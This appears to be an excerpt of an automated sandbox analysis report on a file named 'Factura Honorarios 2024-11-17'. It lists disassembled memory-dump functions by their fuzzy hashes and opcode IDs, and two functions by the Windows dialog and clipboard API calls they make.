                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ec853b35b1a2a90c13e1a0464fd6e587a1229d52ef5f863f481c08f0386549e2
                                                                                                                                  • Instruction ID: ec9315ae0dd609611b949805a4527d77902170516c4a436f96f98a7036f45d17
                                                                                                                                  • Opcode Fuzzy Hash: ec853b35b1a2a90c13e1a0464fd6e587a1229d52ef5f863f481c08f0386549e2
                                                                                                                                  • Instruction Fuzzy Hash: DBC1B074E01218CFEB14DFA9C944B9DBBB2BF89304F1081A9D809AB355DB349E86CF51
                                                                                                                                  Function 39170498 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4ad60c898e460517802c92030f82a02aa2299e812a69ccf8666c0d109ceb985b
                                                                                                                                  • Instruction ID: c119e23e14e00c7ea447aed55be5fac143712784607a3718e4fa057b4f2c8ae6
                                                                                                                                  • Opcode Fuzzy Hash: 4ad60c898e460517802c92030f82a02aa2299e812a69ccf8666c0d109ceb985b
                                                                                                                                  • Instruction Fuzzy Hash: 28C1AE74E01318CFEB14DFA9C954B9DBBB2AF89304F1081A9D809AB355DB349E81CF50
                                                                                                                                  Function 39176488 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 298c2eba00e91c95e1693e1b747e1c72c63c7d749eeb69b396f7ace048270750
                                                                                                                                  • Instruction ID: 2e5fc8a1a46567ca8ae7ae5a5508d2eb3a3e09b45faf74d9a97bf64e700f8ad8
                                                                                                                                  • Opcode Fuzzy Hash: 298c2eba00e91c95e1693e1b747e1c72c63c7d749eeb69b396f7ace048270750
                                                                                                                                  • Instruction Fuzzy Hash: BEC1BE74E01218CFEB14DFA9C984B9DBBB2AF89304F5081A9D809AB355DB359E81CF51
                                                                                                                                  Function 39171EA8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c062063e5cd4ab144a9215a370e14c28adcbdaac15e63d4e4bb84d8597d659e5
                                                                                                                                  • Instruction ID: 7cfe28f3e01bc2b3894d57236d6750c31d9f2de4c8d990f4ea71fe066e807d29
                                                                                                                                  • Opcode Fuzzy Hash: c062063e5cd4ab144a9215a370e14c28adcbdaac15e63d4e4bb84d8597d659e5
                                                                                                                                  • Instruction Fuzzy Hash: C1C1BF74E01218CFEB54DFA9C944B9DBBB2BF89304F1081A9D809AB355DB349E82CF50
                                                                                                                                  Function 39174ED0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f963079702e67569b98db5d8f9a57ee468b5d3f68e94f8529f647e2a33f58b96
                                                                                                                                  • Instruction ID: e02dd6d4da4ad3cb40147ea521b841f1a2e090088a630d4770870e11aae545e7
                                                                                                                                  • Opcode Fuzzy Hash: f963079702e67569b98db5d8f9a57ee468b5d3f68e94f8529f647e2a33f58b96
                                                                                                                                  • Instruction Fuzzy Hash: 8DC1BE74E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E85CF50
                                                                                                                                  Function 391772C8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9d8a6a3f8cee46ebc1d6980154799592dbc0f1ee5d8b955e1a0bda59fefa5c9a
                                                                                                                                  • Instruction ID: 73abd3de5bee8bc62b850ce5a8b402577e74469b6321452244eaf06a5880fe7e
                                                                                                                                  • Opcode Fuzzy Hash: 9d8a6a3f8cee46ebc1d6980154799592dbc0f1ee5d8b955e1a0bda59fefa5c9a
                                                                                                                                  • Instruction Fuzzy Hash: 80C1AF74E01218CFEB14DFA9C984B9DBBB2BF89304F5081A9D809AB355DB349E81CF50
                                                                                                                                  Function 391708F0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7c35676d857b4f9a7cac1a0dadd4d9ff9364749d83b7fd5818ab523cc8b5003f
                                                                                                                                  • Instruction ID: aaec9df19374bc408edc92752ab60ce54735bd4d6925d0632e1d49f9a367e439
                                                                                                                                  • Opcode Fuzzy Hash: 7c35676d857b4f9a7cac1a0dadd4d9ff9364749d83b7fd5818ab523cc8b5003f
                                                                                                                                  • Instruction Fuzzy Hash: 44C1AF74E01218CFEB14DFA9C944B9DBBB2BF89304F2081A9D809AB355DB349E85CF51
                                                                                                                                  Function 38F8D0F8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d620b435eaf1e91d32eaef66ae53e80ba80cb5785e23cba205fc8246546789e4
                                                                                                                                  • Instruction ID: 0754057fd5943646a889fb3e90965f6cf7c31722d942d27a0d461714ba10880e
                                                                                                                                  • Opcode Fuzzy Hash: d620b435eaf1e91d32eaef66ae53e80ba80cb5785e23cba205fc8246546789e4
                                                                                                                                  • Instruction Fuzzy Hash: 49C1B174E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                                                                                                  Function 38F8CCA0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2acd1a6bd2264ca33cb2827095062d3b0a78819e491ce6c578d1d823afd34435
                                                                                                                                  • Instruction ID: 3f45bb7a4a75937aa254e008ee05dcbe424112d8607a926884c52037a7d93fa9
                                                                                                                                  • Opcode Fuzzy Hash: 2acd1a6bd2264ca33cb2827095062d3b0a78819e491ce6c578d1d823afd34435
                                                                                                                                  • Instruction Fuzzy Hash: F5C1BF74E01218CFEB54DFA9C944B9DBBB2BF89300F1081A9D809AB355DB359E81CF51
                                                                                                                                  Function 38F8F810 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 75bb3decc5b02dc808c223251a7cb057c51084400f20f7a144e08ef82d39f10f
                                                                                                                                  • Instruction ID: aeca3217693237d8bbe02cdde747599ec51549f86d9f292d5804abfcfdf837ab
                                                                                                                                  • Opcode Fuzzy Hash: 75bb3decc5b02dc808c223251a7cb057c51084400f20f7a144e08ef82d39f10f
                                                                                                                                  • Instruction Fuzzy Hash: 54C1AF74E01218CFEB14DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E85DF51
                                                                                                                                  Function 38F8D9A8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: aad85cc682ec508fcf5125fb8ae59b4f33e852c333a2db94b480974f3ad6782b
                                                                                                                                  • Instruction ID: e26f0685469d8eb55741a8b3dd3abe2da6d3d308a847e12f21c521cafb2d0d30
                                                                                                                                  • Opcode Fuzzy Hash: aad85cc682ec508fcf5125fb8ae59b4f33e852c333a2db94b480974f3ad6782b
                                                                                                                                  • Instruction Fuzzy Hash: 26C1B075E01218CFEB14DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E81CF51
                                                                                                                                  Function 38F8D550 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5aa84fc786949ae774568f067f240b1c1df557d9fc344d44cdfc3bb9d63ab424
                                                                                                                                  • Instruction ID: c2a3e86c90655d7771e34f7426035c240375675753f8b5583d7366e96b928072
                                                                                                                                  • Opcode Fuzzy Hash: 5aa84fc786949ae774568f067f240b1c1df557d9fc344d44cdfc3bb9d63ab424
                                                                                                                                  • Instruction Fuzzy Hash: 01C1B074E01218CFEB14DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E85DF51
                                                                                                                                  Function 38F8E6B0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 26fbd75f887d31ae710b62ae44f2b83cfba82df796a391ed002e286ca5b340e6
                                                                                                                                  • Instruction ID: 673e7320cedb7ddd543c83b6edf0b721b8ba48d41b65c3a4a66494f7675f84e2
                                                                                                                                  • Opcode Fuzzy Hash: 26fbd75f887d31ae710b62ae44f2b83cfba82df796a391ed002e286ca5b340e6
                                                                                                                                  • Instruction Fuzzy Hash: FFC1C074E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E81CF51
                                                                                                                                  Function 38F8DE00 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 23408b5091c5e553dc6737519ec12efff2f4cc08a61ae5d706ffae7d5007bde0
                                                                                                                                  • Instruction ID: 65ae5e45e7fe8384f00d014b477092cb9396aeaead8bbf7bb2f6dfab8393a010
                                                                                                                                  • Opcode Fuzzy Hash: 23408b5091c5e553dc6737519ec12efff2f4cc08a61ae5d706ffae7d5007bde0
                                                                                                                                  • Instruction Fuzzy Hash: 12C1CF74E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB349E85CF51
                                                                                                                                  Function 38F8F3B8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6352abc41786edf36424edbc5a200dcb94712020ae3dae91553616a283cb28e8
                                                                                                                                  • Instruction ID: 1f645e44f77d5fa382cc8f2f6660f9cc969b15b421e3173217206f044ee8c435
                                                                                                                                  • Opcode Fuzzy Hash: 6352abc41786edf36424edbc5a200dcb94712020ae3dae91553616a283cb28e8
                                                                                                                                  • Instruction Fuzzy Hash: 79C1A074E01218CFEB14DFA9C984B9DBBB2BF89300F5081A9D809AB355DB359E85CF51
                                                                                                                                  Function 38F8EF60 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c03c378cfe93c506c723837d5f48d9c59773ed967e615d3d378928726bafabbb
                                                                                                                                  • Instruction ID: 029e4831758c0ea445a25cc8e6d337f6302a2e3f08595c1e605dec3a2ada1283
                                                                                                                                  • Opcode Fuzzy Hash: c03c378cfe93c506c723837d5f48d9c59773ed967e615d3d378928726bafabbb
                                                                                                                                  • Instruction Fuzzy Hash: B1C1AF74E01218CFEB14DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E85DF51
                                                                                                                                  Function 38F8EB08 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b6e558e4603e1a7133774e160cd6df3179cc3d406b228617075ead0d170705b2
                                                                                                                                  • Instruction ID: d1494078b82c38de2c6c462a99e6407488a3a569ab0d746df7fe6bced4a11ce7
                                                                                                                                  • Opcode Fuzzy Hash: b6e558e4603e1a7133774e160cd6df3179cc3d406b228617075ead0d170705b2
                                                                                                                                  • Instruction Fuzzy Hash: D7C1B074E01218CFEB14DFA9C944B9DBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                                                                                                  Function 3917308F Relevance: .2, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8048ff4948486aa148bc70acc898e93c93c2b36c0bcf06035032563c7c267c89
                                                                                                                                  • Instruction ID: ae1212b6c014af4395ee10af7f29e0d6b8261c98e0d3b1ebca330bb5a13ad220
                                                                                                                                  • Opcode Fuzzy Hash: 8048ff4948486aa148bc70acc898e93c93c2b36c0bcf06035032563c7c267c89
                                                                                                                                  • Instruction Fuzzy Hash: 40B1AF78E00218CFDB14DFA4C980B9DBBB2AF49304F6081A9D809B7355DB359E81DF50
                                                                                                                                  Function 39390A10 Relevance: .2, Instructions: 222COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4f02a04e0362debc6a7170686dbccb28ef309bfb8de8f8f5342f6e976fe0ca6c
                                                                                                                                  • Instruction ID: ad2773872bcdf405c6697fca1a087d5677c575b614d231fbbffef0e703947926
                                                                                                                                  • Opcode Fuzzy Hash: 4f02a04e0362debc6a7170686dbccb28ef309bfb8de8f8f5342f6e976fe0ca6c
                                                                                                                                  • Instruction Fuzzy Hash: A3B16374E10218CFDB54DFA9C894A9DBBB2FF89314F2081A9D819AB365DB30AD41CF51
                                                                                                                                  Function 393909E1 Relevance: .1, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11b437a7853f1eee09c5ddb2b87330b0f79694bd9f613465c05c923ebc9912c2
                                                                                                                                  • Instruction ID: ae7913e8088af08addfff86c6bd423371f7f8ed7e94c994c8f7a334afd2e0f64
                                                                                                                                  • Opcode Fuzzy Hash: 11b437a7853f1eee09c5ddb2b87330b0f79694bd9f613465c05c923ebc9912c2
                                                                                                                                  • Instruction Fuzzy Hash: 0851B474E15648CFDB15CFAAC484ADDBBF2BF89310F2481AAD408AB365D7359942CF11
                                                                                                                                  Function 3917B081 Relevance: .1, Instructions: 98COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb0b748533d8f6a25be4fc4f52f8cd124e57df86da7405d8dc353fbf1162d5f9
                                                                                                                                  • Instruction ID: 61c19210d072cbab77bac90eb4d41a337d8a2b96043e44de30ea67f36dae2bc7
                                                                                                                                  • Opcode Fuzzy Hash: fb0b748533d8f6a25be4fc4f52f8cd124e57df86da7405d8dc353fbf1162d5f9
                                                                                                                                  • Instruction Fuzzy Hash: 6041CAB8D1221A9FDB00CFA8D594BEEBBF1AF49304F1444A9E414B73A0D7799A40CF94
                                                                                                                                  Function 39390D26 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8e775055cad4775742f91ae4ac6d97547bce6288336eb730fca5ae98760381f8
                                                                                                                                  • Instruction ID: f60d4975ebc2101225d65cae5e7b7ba3ead41e8250604b9d17b9d74fb99efb9a
                                                                                                                                  • Opcode Fuzzy Hash: 8e775055cad4775742f91ae4ac6d97547bce6288336eb730fca5ae98760381f8
                                                                                                                                  • Instruction Fuzzy Hash: 7FD06C75D14358CACB20EFA4A8453EEF772BB96305F0020A6D41CAB200DB30AA948B56
                                                                                                                                  Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                                                                    • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405600
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405624
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405673
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                                                                  • CreatePopupMenu.USER32 ref: 004056B8
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                                                                  • EmptyClipboard.USER32 ref: 00405753
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                                                                  • CloseClipboard.USER32 ref: 004057AE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {$6B
                                                                                                                                  • API String ID: 590372296-3705917127
                                                                                                                                  • Opcode ID: 07dce959fb3b4bd7827401e85aa695c337e7b33fdf51fd828ae6b4d9bc2b0272
                                                                                                                                  • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                                                                  • Opcode Fuzzy Hash: 07dce959fb3b4bd7827401e85aa695c337e7b33fdf51fd828ae6b4d9bc2b0272
                                                                                                                                  • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                                                                                                                  Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403D7B
                                                                                                                                  • DestroyWindow.USER32 ref: 00403D8F
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FD1
